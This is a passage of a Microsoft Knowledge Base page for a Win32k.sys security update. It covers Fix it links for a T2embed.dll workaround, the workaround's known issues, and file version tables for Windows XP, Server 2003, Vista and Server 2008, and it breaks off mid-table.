then follow the steps in the Fix it wizard. <div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Enable</th><th class=\"sbody-th\">Disable</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9788941\" text=\"Download\"></div></td><td class=\"sbody-td\"><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9788942\" text=\"Download\"></div></td></tr></table></div>Notes<ul class=\"sbody-free_list\"><li>These wizards may be in English only. However, the automatic fixes also work for other language versions of Windows.</li><li>If you are not on the computer that has the problem, you can save the automatic fix to a flash drive or to a CD, and then you can run it on the computer that has the problem. </li></ul><h3 class=\"sbody-h3\">Known issues with this workaround</h3><ul class=\"sbody-free_list\"><li>Applications that have functionality that relies on the T2embed.dll file, such as applications that generate PDF files, may not work as expected. For example, Microsoft Office software will be unable to generate PDF files.</li><li>After you apply this workaround on a system that is running Windows XP or Windows Server 2003, you may be reoffered security updates 982132 and 972270. You will be unable to install these reoffered updates. The reoffering is a detection logic issue. Users who have previously applied both security updates successfully can ignore the reoffer. </li><li>Microsoft Office 2003 software that has the Microsoft Office Compatibility Pack installed may not open Microsoft Office PowerPoint 2007 (.pptx) files. Instead, you receive the following message: <div class=\"indent\"><div class=\"message\">This file was created by a newer version of Microsoft PowerPoint. Do you want to download a compatibility pack so that you can work with this file?</div></div> You receive this message even though the Microsoft Office Compatibility Pack is already installed.</li></ul></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\"> The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files. <h3 class=\"sbody-h3\">Windows XP and Windows Server 2003 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific milestone (SPn) and service branch (QFE, GDR) are noted in the \"SP requirement\" and \"Service branch\" columns.</li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. QFE service branches contain hotfixes in addition to widely released fixes.</li><li>In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KBnumber.cat) that is signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.1.2600.6178</td><td class=\"sbody-td\">1,859,584</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.1.2600.6178</td><td class=\"sbody-td\">1,868,544</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:29</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Server 2003 and of Windows XP Professional x64 edition</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">4,573,184</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">08:35</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">4,591,616</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">08:30</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">1,861,632</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">14:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">1,872,384</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">14:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">5,602,816</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">08:33</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">5,621,248</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">08:30</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h3 class=\"sbody-h3\">Windows Vista and Windows Server 2008 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (SPn), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table: <div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">Version</td><td class=\"sbody-td\">Product</td><td class=\"sbody-td\">Milestone</td><td class=\"sbody-td\">Service branch</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.6002.18xxx</td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.6002.22xxx</td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li><li>The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are <a bookmark-id=\"manifests\" href=\"#manifests\" managed-link=\"\" target=\"\">listed separately</a>. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.18544</td><td class=\"sbody-td\">2,043,904</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.22745</td><td class=\"sbody-td\">2,052,096</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:35</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.18544</td><td class=\"sbody-td\">2,764,800</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:57</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.22745</td><td class=\"sbody-td\">2,767,360</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:36</td><td class=\"sbody-td\">x64</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.18544</td><td class=\"sbody-td\">6,648,832</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.22745</td><td class=\"sbody-td\">6,658,560</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:36</td><td class=\"sbody-td\">IA-64</td></tr></table></div><h3 class=\"sbody-h3\">Additional file information for Windows Vista and Windows Server 2008</h3><a class=\"bookmark\" id=\"manifests\"></a><h4 class=\"sbody-h4\">Additional files for all supported x86-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,385</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,102</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,227</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,940</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb2639417_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,227</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb2639417~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,940</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_client_2_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,681</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_client_2~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,708</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_client_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,426</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_client~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,446</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc_1_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,677</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc_1~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,704</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,418</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,438</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server_1_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,681</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server_1~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,708</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,426</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,446</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,020</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_15eba5e04425d1c3628cf15d7eddbc55_31bf3856ad364e35_6.0.6002.18544_none_7448bdbccd6ebb75.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_eeed88a208fc8cbf82e0cfad135f2acf_31bf3856ad364e35_6.0.6002.22745_none_5c51dbffe7a63743.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_bab2bc4a97c9dd3c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">6,543</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:30</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_bb3d5b45b0e69384.manifest</td></tr><tr 